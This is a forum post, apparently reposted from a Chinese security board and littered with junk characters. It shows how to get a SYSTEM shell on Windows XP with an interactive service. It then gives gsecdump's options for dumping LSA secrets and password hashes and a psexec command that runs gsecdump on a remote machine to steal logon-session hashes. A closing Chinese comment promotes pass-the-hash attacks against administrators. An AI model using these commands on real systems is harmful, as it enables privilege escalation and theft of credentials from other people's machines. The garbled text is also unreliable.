o get a DOS Prompt as NT system:+ w* z# h3 f7 Z; x# {3 ?1 |: q
9 y1 M# [3 J& @6 z
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact# ~7 V5 l7 x' T% Y
[SC] CreateService SUCCESS
. \& @7 j! O' K+ g+ G; o f: Y
, H) K2 o1 J! d Y% L$ ?9 e7 @5 yC:\>sc start shellcmdline
4 L ^0 B# ]7 I% {[SC] StartService FAILED 1053:8 Q4 D3 q5 A" m9 ^# Q# j
9 @ K( H6 o* f/ ~- Z% S8 m! j) d, gThe service did not respond to the start or control request in a timely fashion.
4 ?% q V' Q2 |$ Y8 n4 Z- ]- a* j, r5 c9 `* @+ P* M: @
C:\>sc delete shellcmdline
9 B( L" L% y+ ][SC] DeleteService SUCCESS
8 u1 }8 L& X- O8 J* |2 U. m3 f, _0 X) o, t
------------! ~ {( P& } ^! Q
/ g* j3 y$ c. Q$ Q* I- ^6 _& OThen in the new DOS window:
: K, ^+ t7 n* O5 C" \& B) l& h5 m5 a1 O! T' C& r
Microsoft Windows XP [Version 5.1.2600]- n1 ?. N) A9 C Q
(C) Copyright 1985-2001 Microsoft Corp.
0 l+ X0 P. N; m* @/ S7 l
: H& N3 y. l; e% q+ a% }# C0 `C:\WINDOWS\system32>whoami- v% X% A! D# M% N0 {
NT AUTHORITY\SYSTEM
" Q! D- C6 i% U9 g
/ g7 Z5 Q: ~0 v* [# q! N4 lC:\WINDOWS\system32>gsecdump -h
% H) t: x/ q2 I5 ~% Ngsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
( g; I/ a! |0 P9 l+ \' \$ g; Zusage: gsecdump [options]5 @2 Q" K$ e4 P0 D5 g/ u' H7 {9 }* a
" p, D- C- @# b B0 b7 T/ Foptions:
! Z; |. j% _4 f2 D, d$ a* E-h [ --help ] show help
/ I! m2 L% y6 G0 K-a [ --dump_all ] dump all secrets
$ l1 ]/ t) z* E2 ]& { @, k# o-l [ --dump_lsa ] dump lsa secrets" ]' S5 S) @3 X2 k4 o" q: h' W+ N
-w [ --dump_wireless ] dump microsoft wireless connections1 T K' A3 L+ t. N0 x6 O) V2 h
-u [ --dump_usedhashes ] dump hashes from active logon sessions
) l6 G' r) _' P0 l4 h+ Q-s [ --dump_hashes ] dump hashes from SAM/AD
) [4 n; \& ~5 @2 ]( D) [: V: p4 X( a) L8 \
Although I like to use:/ P# }6 _' p$ [, z* v) g4 J
% w8 R# `+ A) E2 D1 h# }5 V) yPsExec v1.83 - Execute processes remotely
" W% q/ _# C! K% m. S5 I& TCopyright (C) 2001-2007 Mark Russinovich# [9 \6 s; u0 i6 f; R8 V3 f1 N
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
) k7 S0 A9 y! l7 t
; S. N- [9 c9 c: z4 ~9 h8 LC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT7 c4 j% |3 P0 W" t A* D, T/ U
& Q! V0 B4 N- G5 i# v1 Wto get the hashes from active logon sessions of a remote system.
# v& r9 A/ Z( X, S" C' \( C2 w4 i$ ^+ f3 g3 [
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables. i" Z. V! k, K4 h! A. k: P
- ~6 }. z1 j3 P) [0 q+ Q& O7 v9 T提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.8 e, G' e d e1 \& o4 ~* q" c
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]8 z& ~( M9 R D" {4 J6 j
n/ U9 E' l/ A0 C2 \我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。0 ^ w! ]7 ~% }6 c
|